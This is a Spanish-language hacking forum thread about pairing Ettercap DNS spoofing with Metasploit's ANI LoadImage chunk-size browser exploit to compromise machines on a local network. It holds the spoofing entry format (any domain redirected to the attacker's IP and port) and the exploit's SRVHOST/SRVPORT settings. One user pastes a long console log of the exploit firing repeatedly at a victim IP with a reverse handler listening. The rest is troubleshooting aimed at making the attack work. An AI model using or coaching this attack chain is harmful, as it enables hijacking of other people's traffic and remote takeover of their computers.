[Ettercap+Metasploit] Suplantación de identidad por nombre de dominio [Spoofing]

Iniciado por Shell Root, 10 Enero 2010, 06:24 AM

0 Miembros y 2 Visitantes están viendo este tema.

Shell Root

*: Representa al momento de ingresar a cualquier pagina
192.168.0.3:8080: Representa la URL Infectada con el exploit, mirad el parametro SRVPORT, podes cambiarlo.

Cita de: LastDragon en 13 Febrero 2010, 20:45 PMshell root tiene buenas cualidades para sacarle provecho al 100% de las herramientas con las que cuenta.... felicidades eso hace mucha falta, alguien que haga mas con lo que ya esta hecho
:o
Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.

Debci

Cita de: Shell Root en 13 Febrero 2010, 20:47 PM
*: Representa al momento de ingresar a cualquier pagina
192.168.0.3:8080: Representa la URL Infectada con el exploit, mirad el parametro SRVPORT, podes cambiarlo.

Cita de: LastDragon en 13 Febrero 2010, 20:45 PMshell root tiene buenas cualidades para sacarle provecho al 100% de las herramientas con las que cuenta.... felicidades eso hace mucha falta, alguien que haga mas con lo que ya esta hecho
:o
Por tanto:
192.168.0.3
es nuestra ip?

Saludos

Shell Root

Exacto, es el parametro SRVHOST, osea, 0.0.0.0 o IP Privada, de donde estamos realizando el ataque!
Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.

The Max

heu, muy buena conbinacion,
tengo el siguiente problema miren:

ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA

Listening on eth1...
ERROR : 20, Not a directory
[src/ec_capture.c:src/ec_capture.c:146]

pcap_open: Error opening adapter: El sistema no puede hallar el dispositivo especificado. (20)


como se que interfaz tengo que usar? o cual es el problema? ya probe con eth1,2,0 pero sale el mismo error

Pd: todo eso por la consola de windows .-

beholdthe

shellroot siempre hace cosas increibles, me encantan sus tutoriales de metasploit.
pero este metodo sirve para vista , 7  , o solo sirve para xp¿?¿
muchas gracias alex

Shell Root

@beholdthe
Intenta printear la salida del comando
Código (Metasploit) [Seleccionar]
show targets

En ese exploit ani_loadimage_chunksize, en ese tiempo solo mostraba los siguientes targets
Código (Metasploit) [Seleccionar]
0   (Automatic) IE6, IE7 and Firefox on Windows NT, 2000, XP, 2003 and Vista

Saludos!
Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.

beholdthe

lo hare, tengo muchas ganas de probar esto, tengo que instalar un vista e intentar probarlo
un saludo

Søra

Ola a todos veran a m me pasa el mismo problema si indico el puerto (en etter.dns) no hace la recireccion y si no lo indico pues mirad:


METASPLOIT:
Citarmsf exploit(ms07_017_ani_loadimage_chunksize) > exploit
  • Exploit running as background job.

  • Started reverse handler on 0.0.0.0:4444
  • Using URL: http://0.0.0.0:80/
  •   Local IP: http://192.168.0.129:80/
  • Server started.
    msf exploit(ms07_017_ani_loadimage_chunksize) >
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:3890...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:3892...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:3893...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:3894...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:3895...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:3896...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:3897...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:3895...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:3899...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:3897...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (HTTP) to 192.168.0.128:3899...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (HTTP) to 192.168.0.128:3906...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (HTTP) to 192.168.0.128:3907...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:3921...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:3921...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:3921...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (HTTP) to 192.168.0.128:3946...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:3948...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:3950...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (HTTP) to 192.168.0.128:3951...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:3921...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:3959...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:3971...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:3921...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:3975...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:3983...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (HTTP) to 192.168.0.128:3950...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:3948...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:3959...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:3997...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:3971...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:3921...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:3975...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:3921...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:3971...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:3975...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:3997...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:3997...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:3997...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:4018...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:3997...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (HTTP) to 192.168.0.128:4018...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (HTTP) to 192.168.0.128:3997...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (HTTP) to 192.168.0.128:4029...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:4033...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:3921...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:3971...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:4040...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:4049...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:4049...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:4056...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:4057...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:4056...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:4057...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:4056...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:4063...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:4065...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:4067...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:4069...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:4057...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:4073...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:4075...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:4078...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:4056...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:4057...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:4063...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (HTTP) to 192.168.0.128:4084...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (HTTP) to 192.168.0.128:4086...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:4075...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:4078...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:4088...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:4056...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:4065...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:4067...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:4069...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (HTTP) to 192.168.0.128:4090...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:4092...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:4095...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (HTTP) to 192.168.0.128:4096...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:4073...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:4105...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:4111...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:4112...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:4113...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:4115...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:4117...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:4119...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:4121...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:4123...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:4125...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:4119...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:4123...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:4125...
  • Attempting to exploit ani_loadimage_chunksize
  • Unknown User-Agent Microsoft BITS/6.7 from 192.168.0.128:4127
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:4132...
    Interrupt: use the 'exit' command to quit
Alguno tiene idea???Saludos Søra.





Se busca sabio para intercambio:
Todo lo que se por la mitad de lo que desconozco.


Eomen

Hola buenas,
Estoy siguiendo muchos tutoriales, de metasploit+ettercap...
El caso es que al cargar el exploit m17_017_ani_loadimage_chunksize, en el puerto 80. Al ejecutar el exploit, me sale el siguiente mensaje segun se carga:
[-] Exploit failed: Rex::AddressInUse The address is already in use (192.168.0.193:80)
Lo que vivene a decir que la direccione está en uso.
Si pruebo cargándolo en el 8080, el exploit se me carga completamente..., pero en el 80 (configurado como todos los tutoriales que he visto),me da ese problema.
Con respecto al ettercap, no me da ningún problema (siempre que no le ponga puerto de escucha, porque si le pongo el 8080 no me funciona) , lo único que cuando tengo el exploit lanzado en otro puerto y el etter a la escucha... Al intentar abrir una página para que me redireccione, ésta no se abre. Aunque sí que se refleja en el ettercap..
Si alguien sabe por qué tengo éstos problemas (aunque me imagino que necesitarán más información), a ver si me pueden ayudar.
Gracias y un saludo